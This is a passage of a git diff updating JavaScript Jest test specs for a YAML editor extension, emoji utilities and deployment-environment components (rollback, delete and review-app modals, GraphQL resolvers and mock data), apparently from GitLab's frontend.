expose those to instance', () => { + const highlightPath = 'foo'; const instance = getEditorInstanceWithExtension({ - highlightPath: 'foo', + highlightPath, enableComments: true, }); - expect(instance).toEqual( - expect.objectContaining({ - options: expect.objectContaining({ - highlightPath: 'foo', - enableComments: true, - }), - }), - ); + expect(yamlExtension.obj.highlightPath).toBe(highlightPath); + 
expect(yamlExtension.obj.enableComments).toBe(true); + expect(instance.highlightPath).toBeUndefined(); + expect(instance.enableComments).toBeUndefined(); }); it('dumps values loaded with the model constructor options', () => { @@ -55,7 +59,7 @@ describe('YamlCreatorExtension', () => { it('registers the onUpdate() function', () => { const instance = getEditorInstance(); const onDidChangeModelContent = jest.spyOn(instance, 'onDidChangeModelContent'); - instance.use(new YamlEditorExtension({ instance })); + instance.use({ definition: YamlEditorExtension }); expect(onDidChangeModelContent).toHaveBeenCalledWith(expect.any(Function)); }); @@ -82,21 +86,21 @@ describe('YamlCreatorExtension', () => { it('should call transformComments if enableComments is true', () => { const instance = getEditorInstanceWithExtension({ enableComments: true }); const transformComments = jest.spyOn(YamlEditorExtension, 'transformComments'); - YamlEditorExtension.initFromModel(instance, model); + instance.initFromModel(model); expect(transformComments).toHaveBeenCalled(); }); it('should not call transformComments if enableComments is false', () => { const instance = getEditorInstanceWithExtension({ enableComments: false }); const transformComments = jest.spyOn(YamlEditorExtension, 'transformComments'); - YamlEditorExtension.initFromModel(instance, model); + instance.initFromModel(model); expect(transformComments).not.toHaveBeenCalled(); }); it('should call setValue with the stringified model', () => { const instance = getEditorInstanceWithExtension(); const setValue = jest.spyOn(instance, 'setValue'); - YamlEditorExtension.initFromModel(instance, model); + instance.initFromModel(model); expect(setValue).toHaveBeenCalledWith(doc.toString()); }); }); @@ -240,26 +244,35 @@ foo: it("should call setValue with the stringified doc if the editor's value is empty", () => { const instance = getEditorInstanceWithExtension(); const setValue = jest.spyOn(instance, 'setValue'); - const updateValue = 
jest.spyOn(instance, 'updateValue'); + const updateValueSpy = jest.fn(); + spyOnApi(yamlExtension, { + updateValue: updateValueSpy, + }); instance.setDoc(doc); expect(setValue).toHaveBeenCalledWith(doc.toString()); - expect(updateValue).not.toHaveBeenCalled(); + expect(updateValueSpy).not.toHaveBeenCalled(); }); it("should call updateValue with the stringified doc if the editor's value is not empty", () => { const instance = getEditorInstanceWithExtension({}, { value: 'asjkdhkasjdh' }); const setValue = jest.spyOn(instance, 'setValue'); - const updateValue = jest.spyOn(instance, 'updateValue'); + const updateValueSpy = jest.fn(); + spyOnApi(yamlExtension, { + updateValue: updateValueSpy, + }); instance.setDoc(doc); expect(setValue).not.toHaveBeenCalled(); - expect(updateValue).toHaveBeenCalledWith(doc.toString()); + expect(updateValueSpy).toHaveBeenCalledWith(instance, doc.toString()); }); it('should trigger the onUpdate method', () => { const instance = getEditorInstanceWithExtension(); - const onUpdate = jest.spyOn(instance, 'onUpdate'); + const onUpdateSpy = jest.fn(); + spyOnApi(yamlExtension, { + onUpdate: onUpdateSpy, + }); instance.setDoc(doc); - expect(onUpdate).toHaveBeenCalled(); + expect(onUpdateSpy).toHaveBeenCalled(); }); }); @@ -320,9 +333,12 @@ foo: it('calls highlight', () => { const highlightPath = 'foo'; const instance = getEditorInstanceWithExtension({ highlightPath }); - instance.highlight = jest.fn(); + // Here we do not spy on the public API method of the extension, but rather + // the public method of the extension's instance. 
+ // This is required based on how `onUpdate` works + const highlightSpy = jest.spyOn(yamlExtension.obj, 'highlight'); instance.onUpdate(); - expect(instance.highlight).toHaveBeenCalledWith(highlightPath); + expect(highlightSpy).toHaveBeenCalledWith(instance, highlightPath); }); }); @@ -350,8 +366,12 @@ foo: beforeEach(() => { instance = getEditorInstanceWithExtension({ highlightPath: highlightPathOnSetup }, { value }); - highlightLinesSpy = jest.spyOn(SourceEditorExtension, 'highlightLines'); - removeHighlightsSpy = jest.spyOn(SourceEditorExtension, 'removeHighlights'); + highlightLinesSpy = jest.fn(); + removeHighlightsSpy = jest.fn(); + spyOnApi(baseExtension, { + highlightLines: highlightLinesSpy, + removeHighlights: removeHighlightsSpy, + }); }); afterEach(() => { @@ -361,7 +381,7 @@ foo: it('saves the highlighted path in highlightPath', () => { const path = 'foo.bar'; instance.highlight(path); - expect(instance.options.highlightPath).toEqual(path); + expect(yamlExtension.obj.highlightPath).toEqual(path); }); it('calls highlightLines with a number of lines', () => { @@ -374,14 +394,14 @@ foo: instance.highlight(null); expect(removeHighlightsSpy).toHaveBeenCalledWith(instance); expect(highlightLinesSpy).not.toHaveBeenCalled(); - expect(instance.options.highlightPath).toBeNull(); + expect(yamlExtension.obj.highlightPath).toBeNull(); }); it('throws an error if path is invalid and does not change the highlighted path', () => { expect(() => instance.highlight('invalidPath[0]')).toThrow( 'The node invalidPath[0] could not be found inside the document.', ); - expect(instance.options.highlightPath).toEqual(highlightPathOnSetup); + expect(yamlExtension.obj.highlightPath).toEqual(highlightPathOnSetup); expect(highlightLinesSpy).not.toHaveBeenCalled(); expect(removeHighlightsSpy).not.toHaveBeenCalled(); }); diff --git a/spec/frontend/emoji/index_spec.js b/spec/frontend/emoji/index_spec.js index 9652c513671..cc037586496 100644 --- a/spec/frontend/emoji/index_spec.js +++ 
b/spec/frontend/emoji/index_spec.js @@ -1,6 +1,21 @@ -import { emojiFixtureMap, mockEmojiData, initEmojiMock } from 'helpers/emoji'; +import { + emojiFixtureMap, + mockEmojiData, + initEmojiMock, + validEmoji, + invalidEmoji, + clearEmojiMock, +} from 'helpers/emoji'; import { trimText } from 'helpers/text_helper'; -import { glEmojiTag, searchEmoji, getEmojiInfo, sortEmoji } from '~/emoji'; +import { + glEmojiTag, + searchEmoji, + getEmojiInfo, + sortEmoji, + initEmojiMap, + getAllEmoji, +} from '~/emoji'; + import isEmojiUnicodeSupported, { isFlagEmoji, isRainbowFlagEmoji, @@ -9,7 +24,6 @@ import isEmojiUnicodeSupported, { isHorceRacingSkinToneComboEmoji, isPersonZwjEmoji, } from '~/emoji/support/is_emoji_unicode_supported'; -import { sanitize } from '~/lib/dompurify'; const emptySupportMap = { personZwj: false, @@ -31,14 +45,55 @@ const emptySupportMap = { }; describe('emoji', () => { - let mock; - beforeEach(async () => { - mock = await initEmojiMock(); + await initEmojiMock(); }); afterEach(() => { - mock.restore(); + clearEmojiMock(); + }); + + describe('initEmojiMap', () => { + it('should contain valid emoji', async () => { + await initEmojiMap(); + + const allEmoji = Object.keys(getAllEmoji()); + Object.keys(validEmoji).forEach((key) => { + expect(allEmoji.includes(key)).toBe(true); + }); + }); + + it('should not contain invalid emoji', async () => { + await initEmojiMap(); + + const allEmoji = Object.keys(getAllEmoji()); + Object.keys(invalidEmoji).forEach((key) => { + expect(allEmoji.includes(key)).toBe(false); + }); + }); + + it('fixes broken pride emoji', async () => { + clearEmojiMock(); + await initEmojiMock({ + gay_pride_flag: { + c: 'flags', + // Without a zero-width joiner + e: '🏳🌈', + name: 'gay_pride_flag', + u: '6.0', + }, + }); + + expect(getAllEmoji()).toEqual({ + gay_pride_flag: { + c: 'flags', + // With a zero-width joiner + e: '🏳️🌈', + name: 'gay_pride_flag', + u: '6.0', + }, + }); + }); }); describe('glEmojiTag', () => { @@ -378,32 +433,14 
@@ describe('emoji', () => { }); describe('searchEmoji', () => { - const emojiFixture = Object.keys(mockEmojiData).reduce((acc, k) => { - const { name, e, u, d } = mockEmojiData[k]; - acc[k] = { name, e: sanitize(e), u, d }; - - return acc; - }, {}); - it.each([undefined, null, ''])("should return all emoji when the input is '%s'", (input) => { const search = searchEmoji(input); - const expected = [ - 'atom', - 'bomb', - 'construction_worker_tone5', - 'five', - 'grey_question', - 'black_heart', - 'heart', - 'custard', - 'star', - 'xss', - ].map((name) => { + const expected = Object.keys(validEmoji).map((name) => { return { - emoji: emojiFixture[name], + emoji: mockEmojiData[name], field: 'd', - fieldValue: emojiFixture[name].d, + fieldValue: mockEmojiData[name].d, score: 0, }; }); @@ -453,7 +490,7 @@ describe('emoji', () => { const { field, score, fieldValue, name } = item; return { - emoji: emojiFixture[name], + emoji: mockEmojiData[name], field, fieldValue, score, @@ -564,9 +601,9 @@ describe('emoji', () => { const { field, score, name } = item; return { - emoji: emojiFixture[name], + emoji: mockEmojiData[name], field, - fieldValue: emojiFixture[name][field], + fieldValue: mockEmojiData[name][field], score, }; }); @@ -622,13 +659,4 @@ describe('emoji', () => { expect(sortEmoji(scoredItems)).toEqual(expected); }); }); - - describe('sanitize emojis', () => { - it('should return sanitized emoji', () => { - expect(getEmojiInfo('xss')).toEqual({ - ...mockEmojiData.xss, - e: '<img src="x">', - }); - }); - }); }); diff --git a/spec/frontend/environments/confirm_rollback_modal_spec.js b/spec/frontend/environments/confirm_rollback_modal_spec.js index d62aaec4f69..b699f953945 100644 --- a/spec/frontend/environments/confirm_rollback_modal_spec.js +++ b/spec/frontend/environments/confirm_rollback_modal_spec.js @@ -1,6 +1,9 @@ import { GlModal, GlSprintf } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; +import 
VueApollo from 'vue-apollo'; import ConfirmRollbackModal from '~/environments/components/confirm_rollback_modal.vue'; +import createMockApollo from 'helpers/mock_apollo_helper'; import eventHub from '~/environments/event_hub'; describe('Confirm Rollback Modal Component', () => { @@ -17,6 +20,17 @@ describe('Confirm Rollback Modal Component', () => { modalId: 'test', }; + const envWithLastDeploymentGraphql = { + name: 'test', + lastDeployment: { + commit: { + shortId: 'abc0123', + }, + 'last?': true, + }, + modalId: 'test', + }; + const envWithoutLastDeployment = { name: 'test', modalId: 'test', @@ -26,7 +40,7 @@ describe('Confirm Rollback Modal Component', () => { const retryPath = 'test/-/jobs/123/retry'; - const createComponent = (props = {}) => { + const createComponent = (props = {}, options = {}) => { component = shallowMount(ConfirmRollbackModal, { propsData: { ...props, @@ -34,6 +48,7 @@ describe('Confirm Rollback Modal Component', () => { stubs: { GlSprintf, }, + ...options, }); }; @@ -101,4 +116,121 @@ describe('Confirm Rollback Modal Component', () => { }); }, ); + + describe('graphql', () => { + describe.each` + hasMultipleCommits | environmentData | retryUrl | primaryPropsAttrs + ${true} | ${envWithLastDeploymentGraphql} | ${null} | ${[{ variant: 'danger' }]} + ${false} | ${envWithoutLastDeployment} | ${retryPath} | ${[{ variant: 'danger' }, { 'data-method': 'post' }, { href: retryPath }]} + `( + 'when hasMultipleCommits=$hasMultipleCommits', + ({ hasMultipleCommits, environmentData, retryUrl, primaryPropsAttrs }) => { + Vue.use(VueApollo); + + let apolloProvider; + let rollbackResolver; + + beforeEach(() => { + rollbackResolver = jest.fn(); + apolloProvider = createMockApollo([], { + Mutation: { rollbackEnvironment: rollbackResolver }, + }); + environment = environmentData; + }); + + it('should set contain the commit hash and ask for confirmation', () => { + createComponent( + { + environment: { + ...environment, + lastDeployment: { + 
...environment.lastDeployment, + 'last?': false, + }, + }, + hasMultipleCommits, + retryUrl, + graphql: true, + }, + { apolloProvider }, + ); + const modal = component.find(GlModal); + + expect(modal.text()).toContain('commit abc0123'); + expect(modal.text()).toContain('Are you sure you want to continue?'); + }); + + it('should show "Rollback" when isLastDeployment is false', () => { + createComponent( + { + environment: { + ...environment, + lastDeployment: { + ...environment.lastDeployment, + 'last?': false, + }, + }, + hasMultipleCommits, + retryUrl, + graphql: true, + }, + { apolloProvider }, + ); + const modal = component.find(GlModal); + + expect(modal.attributes('title')).toContain('Rollback'); + expect(modal.attributes('title')).toContain('test'); + expect(modal.props('actionPrimary').text).toBe('Rollback'); + expect(modal.props('actionPrimary').attributes).toEqual(primaryPropsAttrs); + }); + + it('should show "Re-deploy" when isLastDeployment is true', () => { + createComponent( + { + environment: { + ...environment, + lastDeployment: { + ...environment.lastDeployment, + 'last?': true, + }, + }, + hasMultipleCommits, + graphql: true, + }, + { apolloProvider }, + ); + + const modal = component.find(GlModal); + + expect(modal.attributes('title')).toContain('Re-deploy'); + expect(modal.attributes('title')).toContain('test'); + expect(modal.props('actionPrimary').text).toBe('Re-deploy'); + }); + + it('should commit the "rollback" mutation when "ok" is clicked', async () => { + const env = { ...environmentData, isLastDeployment: true }; + + createComponent( + { + environment: env, + hasMultipleCommits, + graphql: true, + }, + { apolloProvider }, + ); + + const modal = component.find(GlModal); + modal.vm.$emit('ok'); + + await nextTick(); + expect(rollbackResolver).toHaveBeenCalledWith( + expect.anything(), + { environment: env }, + expect.anything(), + expect.anything(), + ); + }); + }, + ); + }); }); diff --git 
a/spec/frontend/environments/delete_environment_modal_spec.js b/spec/frontend/environments/delete_environment_modal_spec.js new file mode 100644 index 00000000000..50c4ca00009 --- /dev/null +++ b/spec/frontend/environments/delete_environment_modal_spec.js @@ -0,0 +1,64 @@ +import { GlModal } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; +import VueApollo from 'vue-apollo'; +import { s__, sprintf } from '~/locale'; +import DeleteEnvironmentModal from '~/environments/components/delete_environment_modal.vue'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import { resolvedEnvironment } from './graphql/mock_data'; + +Vue.use(VueApollo); + +describe('~/environments/components/delete_environment_modal.vue', () => { + let mockApollo; + let deleteResolver; + let wrapper; + + const createComponent = ({ props = {}, apolloProvider } = {}) => { + wrapper = shallowMount(DeleteEnvironmentModal, { + propsData: { + graphql: true, + environment: resolvedEnvironment, + ...props, + }, + apolloProvider, + }); + }; + + beforeEach(() => { + deleteResolver = jest.fn(); + mockApollo = createMockApollo([], { + Mutation: { deleteEnvironment: deleteResolver }, + }); + }); + + it('should confirm the environment to delete', () => { + createComponent({ apolloProvider: mockApollo }); + + expect(wrapper.text()).toBe( + sprintf( + s__( + `Environments|Deleting the '%{environmentName}' environment cannot be undone. 
Do you want to delete it anyway?`, + ), + { + environmentName: resolvedEnvironment.name, + }, + ), + ); + }); + + it('should send the delete mutation on primary', async () => { + createComponent({ apolloProvider: mockApollo }); + + wrapper.findComponent(GlModal).vm.$emit('primary'); + + await nextTick(); + + expect(deleteResolver).toHaveBeenCalledWith( + expect.anything(), + { environment: resolvedEnvironment }, + expect.anything(), + expect.anything(), + ); + }); +}); diff --git a/spec/frontend/environments/enable_review_app_modal_spec.js b/spec/frontend/environments/enable_review_app_modal_spec.js index 9a3f13f19d5..17ae10a2884 100644 --- a/spec/frontend/environments/enable_review_app_modal_spec.js +++ b/spec/frontend/environments/enable_review_app_modal_spec.js @@ -1,10 +1,12 @@ import { shallowMount } from '@vue/test-utils'; +import { GlModal } from '@gitlab/ui'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import EnableReviewAppButton from '~/environments/components/enable_review_app_modal.vue'; import ModalCopyButton from '~/vue_shared/components/modal_copy_button.vue'; describe('Enable Review App Button', () => { let wrapper; + let modal; afterEach(() => { wrapper.destroy(); @@ -16,12 +18,15 @@ describe('Enable Review App Button', () => { shallowMount(EnableReviewAppButton, { propsData: { modalId: 'fake-id', + visible: true, }, provide: { defaultBranchName: 'main', }, }), ); + + modal = wrapper.findComponent(GlModal); }); it('renders the defaultBranchName copy', () => { @@ -32,5 +37,15 @@ describe('Enable Review App Button', () => { it('renders the copyToClipboard button', () => { expect(wrapper.findComponent(ModalCopyButton).exists()).toBe(true); }); + + it('emits change events from the modal up', () => { + modal.vm.$emit('change', false); + + expect(wrapper.emitted('change')).toEqual([[false]]); + }); + + it('passes visible to the modal', () => { + expect(modal.props('visible')).toBe(true); + }); }); }); diff --git 
a/spec/frontend/environments/environment_delete_spec.js b/spec/frontend/environments/environment_delete_spec.js index 2d8cff0c74a..057cb9858c4 100644 --- a/spec/frontend/environments/environment_delete_spec.js +++ b/spec/frontend/environments/environment_delete_spec.js @@ -1,37 +1,71 @@ import { GlDropdownItem } from '@gitlab/ui'; - import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import setEnvironmentToDelete from '~/environments/graphql/mutations/set_environment_to_delete.mutation.graphql'; import DeleteComponent from '~/environments/components/environment_delete.vue'; import eventHub from '~/environments/event_hub'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import { resolvedEnvironment } from './graphql/mock_data'; describe('External URL Component', () => { let wrapper; - const createWrapper = () => { + const createWrapper = (props = {}, options = {}) => { wrapper = shallowMount(DeleteComponent, { + ...options, propsData: { - environment: {}, + environment: resolvedEnvironment, + ...props, }, }); }; const findDropdownItem = () => wrapper.find(GlDropdownItem); - beforeEach(() => { - jest.spyOn(window, 'confirm'); + describe('event hub', () => { + beforeEach(() => { + createWrapper(); + }); - createWrapper(); - }); + it('should render a dropdown item to delete the environment', () => { + expect(findDropdownItem().exists()).toBe(true); + expect(wrapper.text()).toEqual('Delete environment'); + expect(findDropdownItem().attributes('variant')).toBe('danger'); + }); - it('should render a dropdown item to delete the environment', () => { - expect(findDropdownItem().exists()).toBe(true); - expect(wrapper.text()).toEqual('Delete environment'); - expect(findDropdownItem().attributes('variant')).toBe('danger'); + it('emits requestDeleteEnvironment in the event hub when button is clicked', () => { + jest.spyOn(eventHub, '$emit'); + findDropdownItem().vm.$emit('click'); + 
expect(eventHub.$emit).toHaveBeenCalledWith('requestDeleteEnvironment', resolvedEnvironment); + }); }); - it('emits requestDeleteEnvironment in the event hub when button is clicked', () => { - jest.spyOn(eventHub, '$emit'); - findDropdownItem().vm.$emit('click'); - expect(eventHub.$emit).toHaveBeenCalledWith('requestDeleteEnvironment', wrapper.vm.environment); + describe('graphql', () => { + Vue.use(VueApollo); + let mockApollo; + + beforeEach(() => { + mockApollo = createMockApollo(); + createWrapper( + { graphql: true, environment: resolvedEnvironment }, + { apolloProvider: mockApollo }, + ); + }); + + it('should render a dropdown item to delete the environment', () => { + expect(findDropdownItem().exists()).toBe(true); + expect(wrapper.text()).toEqual('Delete environment'); + expect(findDropdownItem().attributes('variant')).toBe('danger'); + }); + + it('emits requestDeleteEnvironment in the event hub when button is clicked', () => { + jest.spyOn(mockApollo.defaultClient, 'mutate'); + findDropdownItem().vm.$emit('click'); + expect(mockApollo.defaultClient.mutate).toHaveBeenCalledWith({ + mutation: setEnvironmentToDelete, + variables: { environment: resolvedEnvironment }, + }); + }); }); }); diff --git a/spec/frontend/environments/environment_rollback_spec.js b/spec/frontend/environments/environment_rollback_spec.js index cde675cd9e7..7eff46baaf7 100644 --- a/spec/frontend/environments/environment_rollback_spec.js +++ b/spec/frontend/environments/environment_rollback_spec.js @@ -1,7 +1,11 @@ +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; import { GlDropdownItem } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import RollbackComponent from '~/environments/components/environment_rollback.vue'; import eventHub from '~/environments/event_hub'; +import setEnvironmentToRollback from '~/environments/graphql/mutations/set_environment_to_rollback.mutation.graphql'; +import createMockApollo from 'helpers/mock_apollo_helper'; 
describe('Rollback Component', () => { const retryUrl = 'https://gitlab.com/retry'; @@ -50,4 +54,29 @@ describe('Rollback Component', () => { name: 'test', }); }); + + it('should trigger a graphql mutation when graphql is enabled', () => { + Vue.use(VueApollo); + + const apolloProvider = createMockApollo(); + jest.spyOn(apolloProvider.defaultClient, 'mutate'); + const environment = { + name: 'test', + }; + const wrapper = shallowMount(RollbackComponent, { + propsData: { + retryUrl, + graphql: true, + environment, + }, + apolloProvider, + }); + const button = wrapper.find(GlDropdownItem); + button.vm.$emit('click'); + + expect(apolloProvider.defaultClient.mutate).toHaveBeenCalledWith({ + mutation: setEnvironmentToRollback, + variables: { environment }, + }); + }); }); diff --git a/spec/frontend/environments/graphql/mock_data.js b/spec/frontend/environments/graphql/mock_data.js index e56b6448b7d..e75d3ac0321 100644 --- a/spec/frontend/environments/graphql/mock_data.js +++ b/spec/frontend/environments/graphql/mock_data.js @@ -469,6 +469,33 @@ export const folder = { stopped_count: 0, }; +export const resolvedEnvironment = { + id: 41, + globalId: 'gid://gitlab/Environment/41', + name: 'review/hello', + state: 'available', + externalUrl: 'https://example.org', + environmentType: 'review', + nameWithoutType: 'hello', + lastDeployment: null, + hasStopAction: false, + rolloutStatus: null, + environmentPath: '/h5bp/html5-boilerplate/-/environments/41', + stopPath: '/h5bp/html5-boilerplate/-/environments/41/stop', + cancelAutoStopPath: '/h5bp/html5-boilerplate/-/environments/41/cancel_auto_stop', + deletePath: '/api/v4/projects/8/environments/41', + folderPath: '/h5bp/html5-boilerplate/-/environments/folders/review', + createdAt: '2021-10-04T19:27:00.527Z', + updatedAt: '2021-10-04T19:27:00.527Z', + canStop: true, + logsPath: '/h5bp/html5-boilerplate/-/logs?environment_name=review%2Fhello', + logsApiPath: 
'/h5bp/html5-boilerplate/-/logs/k8s.json?environment_name=review%2Fhello', + enableAdvancedLogsQuerying: false, + canDelete: false, + hasOpenedAlert: false, + __typename: 'LocalEnvironment', +}; + export const resolvedFolder = { availableCount: 2, environments: [ diff --git a/spec/frontend/environments/graphql/resolvers_spec.js b/spec/frontend/environments/graphql/resolvers_spec.js index 4d2a0818996..d8d26b74504 100644 --- a/spec/frontend/environments/graphql/resolvers_spec.js +++ b/spec/frontend/environments/graphql/resolvers_spec.js @@ -1,18 +1,33 @@ import MockAdapter from 'axios-mock-adapter'; import axios from '~/lib/utils/axios_utils'; import { resolvers } from '~/environments/graphql/resolvers'; +import environmentToRollback from '~/environments/graphql/queries/environment_to_rollback.query.graphql'; +import environmentToDelete from '~/environments/graphql/queries/environment_to_delete.query.graphql'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import pollIntervalQuery from '~/environments/graphql/queries/poll_interval.query.graphql'; +import pageInfoQuery from '~/environments/graphql/queries/page_info.query.graphql'; import { TEST_HOST } from 'helpers/test_constants'; -import { environmentsApp, resolvedEnvironmentsApp, folder, resolvedFolder } from './mock_data'; +import { + environmentsApp, + resolvedEnvironmentsApp, + resolvedEnvironment, + folder, + resolvedFolder, +} from './mock_data'; const ENDPOINT = `${TEST_HOST}/environments`; describe('~/frontend/environments/graphql/resolvers', () => { let mockResolvers; let mock; + let mockApollo; + let localState; beforeEach(() => { mockResolvers = resolvers(ENDPOINT); mock = new MockAdapter(axios); + mockApollo = createMockApollo(); + localState = mockApollo.defaultClient.localState; }); afterEach(() => { @@ -21,10 +36,87 @@ describe('~/frontend/environments/graphql/resolvers', () => { describe('environmentApp', () => { it('should fetch environments and map them to frontend data', async () => 
{ - mock.onGet(ENDPOINT, { params: { nested: true } }).reply(200, environmentsApp); + const cache = { writeQuery: jest.fn() }; + const scope = 'available'; + mock + .onGet(ENDPOINT, { params: { nested: true, scope, page: 1 } }) + .reply(200, environmentsApp, {}); - const app = await mockResolvers.Query.environmentApp(); + const app = await mockResolvers.Query.environmentApp(null, { scope, page: 1 }, { cache }); expect(app).toEqual(resolvedEnvironmentsApp); + expect(cache.writeQuery).toHaveBeenCalledWith({ + query: pollIntervalQuery, + data: { interval: undefined }, + }); + }); + it('should set the poll interval when there is one', async () => { + const cache = { writeQuery: jest.fn() }; + const scope = 'stopped'; + const interval = 3000; + mock + .onGet(ENDPOINT, { params: { nested: true, scope, page: 1 } }) + .reply(200, environmentsApp, { + 'poll-interval': interval, + }); + + await mockResolvers.Query.environmentApp(null, { scope, page: 1 }, { cache }); + expect(cache.writeQuery).toHaveBeenCalledWith({ + query: pollIntervalQuery, + data: { interval }, + }); + }); + it('should set page info if there is any', async () => { + const cache = { writeQuery: jest.fn() }; + const scope = 'stopped'; + mock + .onGet(ENDPOINT, { params: { nested: true, scope, page: 1 } }) + .reply(200, environmentsApp, { + 'x-next-page': '2', + 'x-page': '1', + 'X-Per-Page': '2', + 'X-Prev-Page': '', + 'X-TOTAL': '37', + 'X-Total-Pages': '5', + }); + + await mockResolvers.Query.environmentApp(null, { scope, page: 1 }, { cache }); + expect(cache.writeQuery).toHaveBeenCalledWith({ + query: pageInfoQuery, + data: { + pageInfo: { + total: 37, + perPage: 2, + previousPage: NaN, + totalPages: 5, + nextPage: 2, + page: 1, + __typename: 'LocalPageInfo', + }, + }, + }); + }); + it('should not set page info if there is none', async () => { + const cache = { writeQuery: jest.fn() }; + const scope = 'stopped'; + mock + .onGet(ENDPOINT, { params: { nested: true, scope, page: 1 } }) + .reply(200, 
environmentsApp, {}); + + await mockResolvers.Query.environmentApp(null, { scope, page: 1 }, { cache }); + expect(cache.writeQuery).toHaveBeenCalledWith({ + query: pageInfoQuery, + data: { + pageInfo: { + __typename: 'LocalPageInfo', + nextPage: NaN, + page: NaN, + perPage: NaN, + previousPage: NaN, + total: NaN, + totalPages: NaN, + }, + }, + }); }); }); describe('folder', () => { @@ -42,7 +134,7 @@ describe('~/frontend/environments/graphql/resolvers', () => { it('should post to the stop environment path', async () => { mock.onPost(ENDPOINT).reply(200); - await mockResolvers.Mutations.stopEnvironment(null, { environment: { stopPath: ENDPOINT } }); + await mockResolvers.Mutation.stopEnvironment(null, { environment: { stopPath: ENDPOINT } }); expect(mock.history.post).toContainEqual( expect.objectContaining({ url: ENDPOINT, method: 'post' }), @@ -53,7 +145,7 @@ describe('~/frontend/environments/graphql/resolvers', () => { it('should post to the retry environment path', async () => { mock.onPost(ENDPOINT).reply(200); - await mockResolvers.Mutations.rollbackEnvironment(null, { + await mockResolvers.Mutation.rollbackEnvironment(null, { environment: { retryUrl: ENDPOINT }, }); @@ -66,7 +158,7 @@ describe('~/frontend/environments/graphql/resolvers', () => { it('should DELETE to the delete environment path', async () => { mock.onDelete(ENDPOINT).reply(200); - await mockResolvers.Mutations.deleteEnvironment(null, { + await mockResolvers.Mutation.deleteEnvironment(null, { environment: { deletePath: ENDPOINT }, }); @@ -79,7 +171,7 @@ describe('~/frontend/environments/graphql/resolvers', () => { it('should post to the auto stop path', async () => { mock.onPost(ENDPOINT).reply(200); - await mockResolvers.Mutations.cancelAutoStop(null, { + await mockResolvers.Mutation.cancelAutoStop(null, { environment: { autoStopPath: ENDPOINT }, }); @@ -88,4 +180,34 @@ describe('~/frontend/environments/graphql/resolvers', () => { ); }); }); + describe('setEnvironmentToRollback', () => { + 
it('should write the given environment to the cache', () => { + localState.client.writeQuery = jest.fn(); + mockResolvers.Mutation.setEnvironmentToRollback( + null, + { environment: resolvedEnvironment }, + localState, + ); + + expect(localState.client.writeQuery).toHaveBeenCalledWith({ + query: environmentToRollback, + data: { environmentToRollback: resolvedEnvironment }, + }); + }); + }); + describe('setEnvironmentToDelete', () => { + it('should write the given environment to the cache', () => { + localState.client.writeQuery = jest.fn(); + mockResolvers.Mutation.setEnvironmentToDelete( + null, + { environment: resolvedEnvironment }, + localState, + ); + + expect(localState.client.writeQuery).toHaveBeenCalledWith({ + query: environmentToDelete, + data: { environmentToDelete: resolvedEnvironment }, + }); + }); + }); }); diff --git a/spec/frontend/environments/new_environment_folder_spec.js b/spec/frontend/environments/new_environment_folder_spec.js index 5696e187a86..27d27d5869a 100644 --- a/spec/frontend/environments/new_environment_folder_spec.js +++ b/spec/frontend/environments/new_environment_folder_spec.js @@ -3,8 +3,8 @@ import Vue from 'vue'; import { GlCollapse, GlIcon } from '@gitlab/ui'; import createMockApollo from 'helpers/mock_apollo_helper'; import { mountExtended } from 'helpers/vue_test_utils_helper'; +import { __, s__ } from '~/locale'; import EnvironmentsFolder from '~/environments/components/new_environment_folder.vue'; -import { s__ } from '~/locale'; import { resolvedEnvironmentsApp, resolvedFolder } from './graphql/mock_data'; Vue.use(VueApollo); @@ -14,6 +14,7 @@ describe('~/environments/components/new_environments_folder.vue', () => { let environmentFolderMock; let nestedEnvironment; let folderName; + let button; const findLink = () => wrapper.findByRole('link', { name: s__('Environments|Show all') }); @@ -32,6 +33,7 @@ describe('~/environments/components/new_environments_folder.vue', () => { 
environmentFolderMock.mockReturnValue(resolvedFolder); wrapper = createWrapper({ nestedEnvironment }, createApolloProvider()); folderName = wrapper.findByText(nestedEnvironment.name); + button = wrapper.findByRole('button', { name: __('Expand') }); }); afterEach(() => { @@ -61,10 +63,11 @@ describe('~/environments/components/new_environments_folder.vue', () => { }); it('opens on click', async () => { - await folderName.trigger('click'); + await button.trigger('click'); const link = findLink(); + expect(button.attributes('aria-label')).toBe(__('Collapse')); expect(collapse.attributes('visible')).toBe('true'); expect(icons.wrappers.map((i) => i.props('name'))).toEqual(['angle-down', 'folder-open']); expect(folderName.classes('gl-font-weight-bold')).toBe(true); diff --git a/spec/frontend/environments/new_environments_app_spec.js b/spec/frontend/environments/new_environments_app_spec.js index 0ad8e8f442c..1e9bd4d64c9 100644 --- a/spec/frontend/environments/new_environments_app_spec.js +++ b/spec/frontend/environments/new_environments_app_spec.js @@ -1,8 +1,11 @@ -import Vue from 'vue'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; -import { mount } from '@vue/test-utils'; +import { GlPagination } from '@gitlab/ui'; +import { mountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; +import setWindowLocation from 'helpers/set_window_location_helper'; +import { sprintf, __, s__ } from '~/locale'; import EnvironmentsApp from '~/environments/components/new_environments_app.vue'; import EnvironmentsFolder from '~/environments/components/new_environment_folder.vue'; import { resolvedEnvironmentsApp, resolvedFolder } from './graphql/mock_data'; @@ -13,20 +16,59 @@ describe('~/environments/components/new_environments_app.vue', () => { let wrapper; let environmentAppMock; let environmentFolderMock; + let paginationMock; const 
